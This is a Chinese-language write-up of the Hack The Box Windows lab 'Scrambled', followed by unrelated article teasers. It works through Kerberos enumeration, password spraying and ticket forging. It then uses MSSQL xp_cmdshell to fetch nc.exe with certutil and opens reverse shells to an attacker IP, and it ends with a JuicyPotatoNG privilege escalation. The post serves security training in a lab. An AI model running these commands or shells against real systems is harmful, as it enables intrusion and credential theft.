【Hack The Box】windows练习-- Scrambled

news2024/12/28 18:39:33

HTB 学习笔记

【Hack The Box】windows练习-- Scrambled


🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • HTB 学习笔记
    • 信息收集
    • 我看80
    • 我看139
    • 我看88ker
    • 喷洒
    • 黄金票据
    • mssql攻击
    • 借凭证
    • 第二种提权

在这里插入图片描述

信息收集

53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
| ssl-cert: Subject: commonName=DC1.scrm.local
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1433/tcp open  ms-sql-s
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
4411/tcp open  found

commonName=DC1.scrm.local
scrm.local
有dns,web,rpc,smb,mssql,ldap

我看80

在这里插入图片描述在这里插入图片描述
ipconfig > %USERPROFILE%\Desktop\ip.txt
还获得了一个邮箱
support@scramblecorp.com
在这里插入图片描述有一个
ScrambleDebugLog日志文件
4411有一个服务
在这里插入图片描述可以注册用户
在这里插入图片描述dirsearch -u http://scrm.local/ -x 403,401,500,400 -f
没有什么深层目录

我看139

enum4linux 10.10.11.168
啥也没有
rpc也是

我看88ker

第一步永远都是爆破用户

/root/Desktop/tools/windows/kerbrute_linux_amd64 userenum -d scrm.local --dc dc1.scrm.local /root/Desktop/tools/kerberos_enum_userlists-master/A-ZSurnames.txt

在这里插入图片描述得到结果如下

ASMITH@scrm.local
JHALL@scrm.local
KSIMPSON@scrm.local
KHICKS@scrm.local
SJENKINS@scrm.local

接下来进行密码喷洒

喷洒

前面说密码与用个户名相同,我觉得肯定有相同的
/root/Desktop/tools/windows/kerbrute_linux_amd64 passwordspray -d scrm.local --dc dc1.scrm.local user.txt ksimpson

在这里插入图片描述
获取票证

getTGT.py scrm.local/ksimpson:ksimpson -dc-ip 10.129.15.50

impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k -no-pass
但是报错了
于是搜索
好像是靶场的问题

在这里插入图片描述

在这里插入图片描述
发现是因为禁用ntlm造成的
https://github.com/SecureAuthCorp/impacket/issues/1206

在解决问题之后我们继续执行

于是我们得到了

在这里插入图片描述得到hash第一步是尝试爆破密码
在这里插入图片描述我们现在具有凭证
sqlsvc:Pegasus60

在这种情况下我们可以创建黄金票据,黄金票据需要我们知道用户凭据的ntml哈希值,还需要知道该域用户的sid

  1. 获取sid
impacket-secretsdump -k scrm.local/ksimpson@dc1.scrm.local -no-pass -debug

得到sid如下
S-1-5-21-2743207045-1827831105-2542523200-500

  1. ntml哈希值生成
https://codebeautify.org/ntlm-hash-generator

在这里插入图片描述
B999A16500B87D17EC7F2E2A68778F05

黄金票据

S-1-5-21-2743207045-1827831105-2542523200-500

B999A16500B87D17EC7F2E2A68778F05

在生成的时候,500代表用户的种类,要放到user-id 而在sid中要把500去掉

  1. 生成黄金票据
impacket-ticketer -domain scrm.local -spn MSSQLSVC/dc1.scrm.local -user-id 500 Administrator -nthash B999A16500B87D17EC7F2E2A68778F05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200

在这里插入图片描述4. 票据登陆

export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient dc1.scrm.local -k -no-pass

在这里插入图片描述

mssql攻击

enable_xp_cmdshell
 xp_cmdshell("whoami")

在这里插入图片描述SELECT name FROM master.dbo.sysdatabases
使用
ScrambleHR
use ScrambleHR
SELECT name FROM SYSOBJECTS WHERE xtype = ‘U’
select * from UserImport
在这里插入图片描述
MiscSvc:ScrambledEggs9900

一会拿个shell查看一下

xp_cmdshell certutil.exe -urlcache -f http://10.10.16.3/nc.exe ..\..\Temp\nc.exe
xp_cmdshell ..\..\Temp\nc.exe 10.10.14.12 4444 -e cmd.exe

在这里插入图片描述拿到shell之后搞一个winpeas跑一下

certutil.exe -urlcache -f http://10.10.14.12/winpeas64.exe w.exe

在这里插入图片描述

发现了未引号的exe,但是我没用,觉得麻烦
在这里插入图片描述有价值的信息如下

[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe
4411] - Auto - Running - No quotes and Space detected
CanPSRemote
但是winrm连接不上

借凭证

$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('scrm.local\MiscSvc', $SecPassword)

Invoke-Command -Computer dc1 -Credential $Cred -Command { cmd /c C:\Temp\nc.exe -e powershell 10.10.14.12 8888 }

在这里插入图片描述tasklist /v

在这里插入图片描述我不知道为什么我进不去
这很奇怪
我是有进入的权限的

第二种提权

当我在sql主机查看priv的时候,我发现了它

在这里插入图片描述
https://github.com/antonioCoco/JuicyPotatoNG/releases/tag/v1.1

cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 .

去掉多余的东西,只留下icmp反弹的部分
在这里插入图片描述
变更格式,使得脚本可以按照ps bat执行

cat rev.ps1 |iconv -t UTF-16LE | base64 -w 0

这是靶场把流氓土豆拿上去
curl http://10.10.14.12/JuicyPotatoNG.exe -o jp.exe
64

在这里插入图片描述

powershell -enc [第二步的base64]

执行
./jp.exe -t * -p C:\Temp\t.bat

在这里插入图片描述
即可拿到system

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/14194.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

第2-3-5章 删除附件的接口开发-文件存储服务系统-nginx/fastDFS/minio/阿里云oss/七牛云oss

文章目录5.4 接口开发-根据id删除附件5.4.1 接口文档5.4.2 代码实现5.4.3 接口测试5.4.4 测试ALI和FAST_DFS以及MINIO上传和删除的接口5.4.4.1 阿里云OSS上传和删除5.4.4.2 FastDFS上传和删除5.4.4.3 Minio上传和删除5.5 接口开发-根据业务类型/业务id删除附件5.5.1 接口文档5.…

[附源码]SSM计算机毕业设计成都团结石材城商家协作系统JAVA

项目运行 环境配置: Jdk1.8 Tomcat7.0 Mysql HBuilderX(Webstorm也行) Eclispe(IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持)。 项目技术: SSM mybatis Maven Vue 等等组成,B/S模式 M…

力扣(LeetCode)6. Z 字形变换(C++)

数学构造 ZZZ 字形变换类似情报加密。找规律解密,就能得到构造的方法。 第 000 行相邻的数,取 n4n4n4 如上图,观察第 000 行和第 333 行 相邻的数,组成等差数列,公差 d62n−2d62n-2d62n−2 2n−22n-22n−2 是说 &…

【小程序】微信小程序云开发笔记详细教程(建议收藏)

1- 前言 1.1 微信云开发是什么? 微信云开发是微信团队联合腾讯云推出的专业的小程序开发服务。 开发者可以使用云开发快速开发小程序、小游戏、公众号网页等,并且原生打通微信开放能力。 开发者无需搭建服务器,可免鉴权直接使用平台提供的…

Spring Cloud | 实现Eureka Server 高可用服务注册中心全套解决方案

目录1、在搭建Eureka Server,配置高可用服务注册中心,配置3个Eureka Server:2、因为是在本地实现的话,需要在localhost加入三个服务,需要改变etc/hosts,linux系统通过vim /etc/hosts,3、如果是在测试或者是…

最优孤岛划分下含分布式电源配电网可靠性评估附Matlab代码

✅作者简介:热爱科研的Matlab仿真开发者,修心和技术同步精进,matlab项目合作可私信。 🍎个人主页:Matlab科研工作室 🍊个人信条:格物致知。 更多Matlab仿真内容点击👇 智能优化算法 …

小学生python游戏编程arcade----坦克大战(1)

小学生python游戏编程arcade----坦克大战(1)前言坦克类,地图,角色的控制,声音等前期学习的汇总1、坦克类2、title地图加载2.1设置,tank类的引入2.2 角色的引入2.3 效果图2.4 代码实现总结源码获取前言 接上…

kafka学习之基本概念

一、kafka常用基本概念 producer:生产者,生产并发送消息的一方。 consumer:消费者,接收消费消息的一方。 topic:一类消息的集合。在kafka中,消息以主题为单位进行归类,producer负责将消息发送…

云服务器 宝塔部署SpringBoot前后端分离项目

🦆博主介绍:小黄鸭技术 🌈擅长领域:Java、实用工具、运维 👀 系列专栏:📢开发工具 Java之路 八股文之路 📧如果文章写作时有错误的地方,请各位大佬指正,一起进…

舆情监控究竟是什么?怎么运作的?

本文首发于:行者AI谛听 随着互联网的加速变化,舆论已成为影响国家政治、社会生活和公众情绪的重要因素,也是影响企业形象和长远发展的重要因素。能及时收集精准措施以及预防减少和消除舆论带来的影响,是行业长远发展的关键条件。下…

泰凌微蓝牙 HCI层事件的注册和使用

Controler HCI event是通过HCI将Controller所有的event报告给Host HCI event是按BLE Spec标准设计的,是BLE Controller和Host用来交互的事件;GAP event是BLE host定义的一些协议栈流程交互时间通知型事件。 HCI event类型 #define HCI_EVT_DISCONNEC…

【Hack The Box】windows练习-- Object

HTB 学习笔记 【Hack The Box】windows练习-- Object 🔥系列专栏:Hack The Box 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2022年11月17日🌴 &#x1…

链表oj题(第一弹)

通过前两篇博客我们了解了链表的实现,那么今天我们来看看链表的oj题是如何完成的。 1、移除链表元素 题目要求我们删掉与val相同的节点。 方法一:我们可以写一个循环,首先创建两个节点,一个头节点,一个尾节点&#x…

Jmeter常用函数__V和__intSum

文章目录一、__V详解1、作用2、示例二、__intSum详解1、作用2、示例三、示例--随机用户名四、示例--随机对应的用户名和密码一、__V详解 1、作用 执行变量表达式,并返回执行的结果可以执行嵌套函数 2、示例 1、固定值和随机数组合 ${__V(1.${__Random(1,10,)})}…

[附源码]java毕业设计民宿客栈管理系统

项目运行 环境配置: Jdk1.8 Tomcat7.0 Mysql HBuilderX(Webstorm也行) Eclispe(IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持)。 项目技术: SSM mybatis Maven Vue 等等组成,B/S模式 M…

[Python]Django 模型

🍉 前言 系列文章目录 [Python]目录 文章目录🍉 前言🍉 Django 模型🍉 定义模型🥝 语法🥝 常用模型字段类型🥑 AutoField🥑 BooleanField🥑 NullBooleanField&#x1f95…

【服务器搭建】教程二:快速搭建我们服务器 进来看

前言: 购买一台服务器,再来个域名,搭建一个自己的个人博客,把一些教程、源码、想要分享的好玩的放到博客上,供小伙伴学习玩耍使用。 我把这个过程记录下来,想要尝试的小伙伴,可以按照步骤&#…

Jmeter连接数据库_postgresql

文章目录一、下载驱动包(.jar)1. 下载对应的安装包2、放在Jmeter的lib目录下二、Jmeter中的操作1、测试计划2、JDBC Connection Configuration3、JDBC Request三、具体示例一、下载驱动包(.jar) 不同的数据区需要的驱动包不同&am…

Systemd Rsync 文件定时同步

1. 环境 操作系统:CentOS 7 主机: master 192.168.0.98backup 192.168.0.166 目标:每天凌晨3点从master 上/www增量的复制到backup上。 2. 配置主机的免密登录 在Backup上配置主机的免密登录,请参考 SSH 公钥免密登录[1] 3. Rsync 服…

一只程序猿很黄很暴力的日记

一些基础概念: Socket(s):主板上面的物理 CPU 插槽。 Core(s):一个 CPU 一般包含 2~4 个 core,即 Core(s) per socket。 Thread(s):一个 core 包含多个可以并行处理任务的 thread,即 Thread(s) per core…